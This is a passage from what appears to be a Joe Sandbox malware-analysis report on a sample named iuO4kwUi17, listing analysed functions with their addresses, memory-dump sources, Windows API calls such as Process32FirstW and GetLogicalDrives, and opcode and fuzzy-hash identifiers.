                                    • Instruction ID: 1b3de9ba8cbb6695739736110a2b508c951079aff6f6364e1f57c26d703aa962
                                    • Opcode Fuzzy Hash: 135855e7dd720fbaad7c8626b5f8c9dcbba01eebe45f8d8ef3a63aba1cb4d238
                                    • Instruction Fuzzy Hash: 0011E9E795C211BEB241C5A55B519FF27ADF5D3230730883BF447C6245F6A448055232
                                    Function 075E0409 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 060227ac5f82ddad5a146d66dfa0fa8f9a2b80f70cee80d9c983125e9a31692a
                                    • Instruction ID: 246339c5981238248053047ce48dced7211ea696b468e41af8a500170805f78d
                                    • Opcode Fuzzy Hash: 060227ac5f82ddad5a146d66dfa0fa8f9a2b80f70cee80d9c983125e9a31692a
                                    • Instruction Fuzzy Hash: 9F01D6EB92C621AEA10990A02F156F6672EF6D7731B308E26F44FC55C2F2D49A090671
                                    Function 075A035F Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: d66919bbed1ad27e89fcfe2631b09cfc7fc40b05ba7e419433a7625615f8f6e9
                                    • Instruction ID: 4b47a626bddb1d4f8f903f89400386e6a156957ee3443fb2980093c04e005e4d
                                    • Opcode Fuzzy Hash: d66919bbed1ad27e89fcfe2631b09cfc7fc40b05ba7e419433a7625615f8f6e9
                                    • Instruction Fuzzy Hash: 000126E7E78211BE724181A667505FF27ADF5D32307308C37F40BC6681F6A449050132
                                    Function 075E03AB Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 00fadb0278eed9b437fc9bb5dd00af03dcec469789b1acab52cedc201f065db6
                                    • Instruction ID: de858fc140427fc2d731991dbb1bacc43506d9022e12f0c8410cd254976a285a
                                    • Opcode Fuzzy Hash: 00fadb0278eed9b437fc9bb5dd00af03dcec469789b1acab52cedc201f065db6
                                    • Instruction Fuzzy Hash: 0F01DBDBA2C110BDA04954E42F60AF6172EF5E77307308E66F80FD59C6F6D48A090375
                                    Function 075A039E Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 8a044eb9d2e9f9ee12981ba05041820bba15057bfb2567da72b803a4eb0cd568
                                    • Instruction ID: 2bc5622282ddf7fecad75ed6ad319d943e4abebb69df1735f615eeb7143c4c18
                                    • Opcode Fuzzy Hash: 8a044eb9d2e9f9ee12981ba05041820bba15057bfb2567da72b803a4eb0cd568
                                    • Instruction Fuzzy Hash: F401B1E7A1C262BEA301C5A96B508FF2BACF5C32307318877F906C6189F2944D055232
                                    Function 07630000 Relevance: .1, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920540196.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7630000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 553767aad8a5e2573e38e8ec94f9af95556a1bafd1631113c3484b0f1634e7df
                                    • Instruction ID: b4f3c2c7e30c0ad7a61cb64a31d9edca4b7b3ed9508728b66dee1ff7a6669d7e
                                    • Opcode Fuzzy Hash: 553767aad8a5e2573e38e8ec94f9af95556a1bafd1631113c3484b0f1634e7df
                                    • Instruction Fuzzy Hash: 042129EB26C115BDB15290862F64EF75A2FE6D3B30F31842BF807D8442F7954A4E9031
                                    Function 07580AEE Relevance: .1, Instructions: 102COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920312052.0000000007580000.00000040.00001000.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7580000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3bbd3c661c6cc2e41735714f950f548df988840d88e53a6aaba88c063e8fcb8
                                    • Instruction ID: ca07df1cd191bb72fbfdb1f75f25d73e7d72510e0f5f5bc197c07cb39099a0f9
                                    • Opcode Fuzzy Hash: b3bbd3c661c6cc2e41735714f950f548df988840d88e53a6aaba88c063e8fcb8
                                    • Instruction Fuzzy Hash: AB214CE241D2889FC7C3A96046517FD7F647A03226F2508A7D49ABF2D2D1554E0E8631
                                    Function 07630140 Relevance: .1, Instructions: 66COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920540196.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7630000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2122b913531fc7969d773782de7d5e59fd186638df6d75de35b2ec1237bcfc3
                                    • Instruction ID: afdddf05aa23f3a557182cbc49db919c8b8c54d62998dd2714ec9bd84cf2377b
                                    • Opcode Fuzzy Hash: c2122b913531fc7969d773782de7d5e59fd186638df6d75de35b2ec1237bcfc3
                                    • Instruction Fuzzy Hash: 7DF06DEB16D1157D3143A1C12B689F66B2FE5E37317308427F847D4601F6860B4E9179
                                    Function 07630150 Relevance: .1, Instructions: 57COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920540196.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7630000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e274d5454bac52bbe1d5f1c25b4421c824572dce372a04c8b81bb3498ad57bd1
                                    • Instruction ID: 1657146d5273cb1587fe1a6b16436085018e12e2f0e47df3f3cd2b338ec67922
                                    • Opcode Fuzzy Hash: e274d5454bac52bbe1d5f1c25b4421c824572dce372a04c8b81bb3498ad57bd1
                                    • Instruction Fuzzy Hash: 21F08CEB16D116BC3043A1C12B649F65B2FE5E3B30A308433F447D0501F2850B4E9171
                                    Function 0763015B Relevance: .1, Instructions: 54COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920540196.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7630000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cbda286ec29a37506d3abc04243670f045ecda480c75556a62567fb6438b8cfa
                                    • Instruction ID: be5ed03182ae49fc6668546d3f80703ec458d231feb5e3e3c8d3ba01990ae3a8
                                    • Opcode Fuzzy Hash: cbda286ec29a37506d3abc04243670f045ecda480c75556a62567fb6438b8cfa
                                    • Instruction Fuzzy Hash: FEF090EB56D2027DB683D1D02B15DF66B2FEAE3730B318067F447C5402E2864A1F8171
                                    Function 076301A9 Relevance: .1, Instructions: 52COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920540196.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7630000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62f181cdca51aa78e5c76cf8dade79896ce1aef983d4a30db7b57429fd0618d1
                                    • Instruction ID: 8b6c94d261908f8bbe472854594fbfccc53083d1e661a2d1e03537747706487f
                                    • Opcode Fuzzy Hash: 62f181cdca51aa78e5c76cf8dade79896ce1aef983d4a30db7b57429fd0618d1
                                    • Instruction Fuzzy Hash: 0CF015EB2AD016BC3543A1C26B249FA6B2FE9E77306708427F44390512F2850A4E9135
                                    Function 07580B49 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920312052.0000000007580000.00000040.00001000.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7580000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 74d6a5c20c429c9b72994422fb4d6805728032a0afc12c77d4d3d5835340df9b
                                    • Instruction ID: efdfb158134035d210c4c5ffe458a30d30bbb433f582cf3eca4e3e3367598d5e
                                    • Opcode Fuzzy Hash: 74d6a5c20c429c9b72994422fb4d6805728032a0afc12c77d4d3d5835340df9b
                                    • Instruction Fuzzy Hash: 88F0BEF542C208DFC7D2EEA082143FE37B17F5323AF20486AD89A76280D7755E499622
                                    Function 07580B26 Relevance: .0, Instructions: 36COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920312052.0000000007580000.00000040.00001000.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7580000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ddcae5478bd53657d5d6d06229dd7d787eb8fcea34062a0a280f270435aa573
                                    • Instruction ID: bb0255193bd8fcb70c5cd2fab24ccb2841412604c715c3fcdabda80a3cd2e790
                                    • Opcode Fuzzy Hash: 6ddcae5478bd53657d5d6d06229dd7d787eb8fcea34062a0a280f270435aa573
                                    • Instruction Fuzzy Hash: EAF082F502C108DBD6C2BA9082247FD77A57B4722BF304C56D89F763C1D2654E49A522
                                    Function 07580B77 Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920312052.0000000007580000.00000040.00001000.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7580000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ed5a80565483d07ca7d0ae01ad55e9ede14c1b7b2ee40ed1de70bdf5b5f3965
                                    • Instruction ID: b1e997702cb92e8f124b43e23a01d2f0c0c8cb9c87ca075facf6f5406f204cb8
                                    • Opcode Fuzzy Hash: 5ed5a80565483d07ca7d0ae01ad55e9ede14c1b7b2ee40ed1de70bdf5b5f3965
                                    • Instruction Fuzzy Hash: 7FE09BE5018118D6D6C2AE5443243FD77A57B1B32AF300852D4DA72281D3550E55A931
                                    Function 07580B6B Relevance: .0, Instructions: 29COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920312052.0000000007580000.00000040.00001000.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7580000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd1dff8b5f35503d7d2448856a71919f7feb069d26f229460626c1c3f6b6828e
                                    • Instruction ID: 81a70d99e8e6d3abe2f766c75ac987118cc72a234e4bedb49667a711e7d236a0
                                    • Opcode Fuzzy Hash: dd1dff8b5f35503d7d2448856a71919f7feb069d26f229460626c1c3f6b6828e
                                    • Instruction Fuzzy Hash: 2AE092F5028118DBD7C2AA9082243FC7BA07B5722AF200896D89B32780D2650E49A532

                                    Non-executed Functions

                                    Function 0758035B Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920312052.0000000007580000.00000040.00001000.00020000.00000000.sdmp, Offset: 07580000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7580000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4a0534b563d6a80a4b9542d9796ceaa4cafd74d71c9cd37d07c5f0a3c6ac62f8
                                    • Instruction ID: ef7fda6d14a638b98eb2a0d31aa7c0797991d474646db3c13695e5e9e8f9cdc6
                                    • Opcode Fuzzy Hash: 4a0534b563d6a80a4b9542d9796ceaa4cafd74d71c9cd37d07c5f0a3c6ac62f8
                                    • Instruction Fuzzy Hash: 96F0A0EA15D5197F71A1B155AF25BFB572CE6C2A30B208A37B85AF14C2A9840A4E1072